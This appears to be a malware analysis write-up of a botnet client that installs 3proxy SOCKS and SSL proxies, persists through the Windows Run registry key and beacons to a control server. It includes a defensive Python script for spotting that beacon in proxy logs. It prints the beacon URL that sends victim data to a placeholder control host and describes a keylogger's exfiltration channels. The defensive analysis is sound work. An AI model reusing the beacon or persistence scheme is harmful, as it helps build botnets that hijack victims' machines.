The Client:
First off, most machines are infected through phishing spam that leads to a web page infested with various IE exploits. The favorite for quite some time was the .chm bug, and it is still used often. BTW these guys are pretty much using modified PoC code, nothing really original.

The zombie client is made up of three main parts:
the master program and two proxy servers. In most versions both are UPX compressed.
1. On first run the master program copies itself to %SystemRoot% and extracts the proxy servers into the %SystemRoot%\system32 directory.
All the versions I've come across use modified copies of 3proxy, found at http://www.security.nnov.ru/soft/3proxy
One proxy is a SOCKS 4/5 proxy, the other an Elite SSL proxy.

2. It sets itself up in the registry to run on boot,
under either the local machine (HKLM) or the current user (HKCU) hive depending on the RC: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run

3. It then runs the two proxy servers on random ports between 1200 and 60200 (the second port is the first port + 2).

4. Every ten minutes it then goes through the motions to gather the necessary data and report to the control server.

First it checks that the computer has a decent connection speed by pinging:
ping.exe www.linux.org -n 1 -l 1
ping.exe www.linux.org -n 1 -l 1024

It then reports home to:
http://{ControlServer}/{whateverdir}/index.php?IP=%s&Port1=%u&Port2=%u&ID=%s&ver=%s&con=%s&ping1=%s&ping2=%s

IP = client IP
Port1 = the first proxy's port (Elite SSL)
Port2 = the second proxy's port (SOCKS 4/5)
ID = 24 digits. I still haven't quite figured out how this is determined; part of the ID is the date the client was first installed
ver = the version of the control program; they are currently up to RC19, and I've been "tracking" them since RC14
con = Modem or Lan
ping1 = the response time of "ping.exe www.linux.org -n 1 -l 1"
ping2 = the response time of "ping.exe www.linux.org -n 1 -l 1024"

5. The server then responds with a command if one is set, or with a blank HTML page. Note: if you try viewing that page with a standard web browser you will either be redirected to the front page of the site or given the message "You are not a bot".
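
Built from the beacon format described above, here is an added detection example (not code from the original page or from the bot itself): it scans web-proxy log lines for requests of that shape and checks the structural invariants the write-up gives (Port2 = Port1 + 2 inside 1200..60200, a 24-digit ID, an RCnn version, con of Modem or Lan). The host names, the directory name and the log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample web-proxy log lines (not from the original page). The first
# matches the beacon shape; the second is benign; the third is a near-miss.
SAMPLE_LOGS = [
    '10.0.0.5 - - [12/Mar/2005:10:14:02] "GET http://control.example.invalid/stat/index.php?IP=10.0.0.5&Port1=23456&Port2=23458&ID=200503120000000000000001&ver=RC19&con=Lan&ping1=12&ping2=31 HTTP/1.1" 200 0',
    '10.0.0.7 - - [12/Mar/2005:10:15:44] "GET http://www.example.invalid/index.php?page=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Mar/2005:10:16:01] "GET http://other.example.invalid/x/index.php?IP=10.0.0.9&Port1=2000&Port2=2005&ID=abc&ver=RC14&con=Modem&ping1=5&ping2=9 HTTP/1.1" 200 0',
]

# The eight query parameters the beacon always carries.
BEACON_KEYS = {"IP", "Port1", "Port2", "ID", "ver", "con", "ping1", "ping2"}
REQ_RE = re.compile(r'"GET (\S+) HTTP/')


def beacon_score(url):
    """Return the list of matched indicators for a URL, or [] if it is not beacon-shaped."""
    parts = urlsplit(url)
    if not parts.path.endswith("/index.php"):
        return []
    qs = parse_qs(parts.query)
    if not BEACON_KEYS.issubset(qs):
        return []
    hits = ["all eight beacon parameters present"]
    try:
        p1, p2 = int(qs["Port1"][0]), int(qs["Port2"][0])
    except ValueError:
        return hits  # shape matches but ports are not numeric; still worth a look
    if 1200 <= p1 <= 60200 and p2 == p1 + 2:
        hits.append("Port2 == Port1 + 2 within 1200-60200")
    if re.fullmatch(r"\d{24}", qs["ID"][0]):
        hits.append("24-digit ID")
    if re.fullmatch(r"RC\d+", qs["ver"][0]):
        hits.append("RCnn version string")
    if qs["con"][0] in ("Modem", "Lan"):
        hits.append("con is Modem/Lan")
    return hits


def scan_logs(lines):
    """Map each source IP to its indicator hits, for lines whose request looks like a beacon."""
    findings = {}
    for line in lines:
        m = REQ_RE.search(line)
        if not m:
            continue
        hits = beacon_score(m.group(1))
        if hits:
            findings[line.split()[0]] = hits
    return findings
```

The more invariants a request satisfies, the stronger the match; a single hit on the parameter set alone is a triage lead, not a verdict.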

The master program in most RCs also extracts a keylogger/screencap trojan of some sort. The logs are sent back in various forms: FTP, POST, or email to free Russian email addresses.
Types of Traffic
